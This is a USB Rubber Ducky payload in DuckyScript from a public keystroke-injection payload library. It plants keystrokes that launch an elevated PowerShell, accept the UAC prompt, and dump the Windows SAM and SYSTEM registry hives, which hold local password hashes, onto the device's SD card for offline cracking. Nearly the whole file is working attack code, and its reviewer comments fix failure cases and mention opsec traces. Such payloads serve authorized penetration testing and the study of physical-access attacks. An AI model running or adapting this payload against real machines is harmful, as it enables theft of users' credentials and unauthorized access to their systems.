hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/NTLM_ducky/payload.txt
1
REM_BLOCK
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
AUTHOR Luu176
DESCRIPTION Copies the SAM and SYSTEM registry hives (which together hold the local
users' hashed passwords) from the Windows target onto the Rubber Ducky's own SD card
for offline analysis. The payload spawns an elevated PowerShell, locates the Ducky's
mass-storage volume by its label, and writes the hives there with 'reg save' as the
files SAM and SYS. Needs the Ducky's storage mode and an admin session on the target.
END_REM

REM How many times Caps Lock flashes once the dump has finished (default 9).
DEFINE #numBlinks 9
REM Volume label of the Ducky's SD card. The PowerShell one-liner finds the target
REM drive by this label, so it must match what Windows shows for the card.
DEFINE #driveLabel DUCKY

REM HID so the Ducky can type; STORAGE so the SD card is mounted on the host and the
REM hives can be written straight onto it.
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
REM #MAX_WAIT x #CHECK_INTERVAL ms is the longest the wait loop below runs
REM (150 x 20 ms = 3 s with these defaults) before giving up on a lock-LED reply.
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
REM Threshold on the number of HID configuration requests seen from the host;
REM more than this is taken to mean Windows.
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

REM Default verdict; only overwritten if the host looks like Windows below.
$_OS = #NOT_WINDOWS

REM Passive wait: poll until the host has answered the keyboard's lock-LED report
REM or the try budget is exhausted. This also serves as the payload's boot delay.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM The classification runs even if the loop above timed out without a reply.
REM NOTE(review): the premise that a Windows host issues more than
REM #WINDOWS_HOST_REQUEST_COUNT configuration requests during enumeration comes from
REM the extension author and is not verifiable from this file. If it misfires, $_OS
REM stays at #NOT_WINDOWS (7) and anything gated on $_OS == WINDOWS is skipped.
REM NOTE(review): WINDOWS is used as a bare identifier, unlike the DEFINEd
REM #NOT_WINDOWS; presumably a built-in $_OS constant - confirm in the firmware docs.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
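REM Caps Lock doubles as the completion signal below, so record the host's lock state
REM and start from Caps Lock OFF; RESTORE_HOST_KEYBOARD_LOCK_STATE puts it back at the end.
REM (THEN added to match the IF syntax used by the extension above.)
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ($_CAPSLOCK_ON == TRUE) THEN
    CAPSLOCK
END_IF

REM Loop counter for the completion blinks; declared at top level, used inside the IF.
VAR $i = 0

REM Gate the keystroke sequence on the passive detector's verdict. Previously the
REM payload ran unconditionally: on a non-Windows host it typed into whatever had
REM focus and then blocked forever in WAIT_FOR_CAPS_ON, since nothing there ever
REM toggles Caps Lock for us.
IF ($_OS == WINDOWS) THEN
    REM Show the desktop, open the Run dialog and launch an elevated PowerShell.
    REM ALT y answers a UAC consent prompt: this assumes the logged-in user is a local
    REM admin with UAC in consent (not credential) mode. A credential prompt or a
    REM standard user is not handled and the payload will stall at WAIT_FOR_CAPS_ON.
    REM The 800 ms before ALT y is the time allowed for the UAC dialog to appear;
    REM slow hosts may need more (not tested here).
    GUI d
    DELAY 1000
    GUI r
    DELAY 500
    STRINGLN powershell Start-Process powershell -Verb runAs
    DELAY 800
    ALT y
    DELAY 800
    REM Locate the Ducky's mass-storage volume by its label (#driveLabel) and cd into it.
    REM The hive dumps sit inside the try block so they only run if the cd succeeded.
    REM Before, an unmounted/mislabelled volume made cd fail and 'reg save' then wrote
    REM SAM and SYS into the elevated shell's working directory on the HOST disk
    REM (typically C:\Windows\System32): no exfil, plus a forensic artifact left behind.
    REM '/y' overwrites files from an earlier run; without it 'reg save' refuses with
    REM 'The file exists'. Caps Lock is toggled after the try/catch in every case so the
    REM wait below never hangs - confirm success by checking the SD card for SAM and SYS.
    REM Opsec: the Run dialog (RunMRU) and any PowerShell/process logging on the host
    REM will record this. The SECURITY hive is not saved by this payload; add
    REM 'reg save hklm\security SECURITY /y' inside the try block if it is wanted.
    STRINGLN try{cd -ea Stop (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM /y;reg save hklm\system SYS /y}catch{};(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
    REM Minimise everything while the dump runs.
    GUI d
    REM Block until PowerShell toggles Caps Lock ON. 'reg save' can take a while
    REM (the original author notes up to a couple of minutes).
    WAIT_FOR_CAPS_ON
    REM Flash Caps Lock #numBlinks times so the operator knows the run is over.
    $i = 0
    WHILE ($i < #numBlinks)
        DELAY 150
        CAPSLOCK
        $i = ($i + 1)
    END_WHILE
END_IF
RESTORE_HOST_KEYBOARD_LOCK_STATE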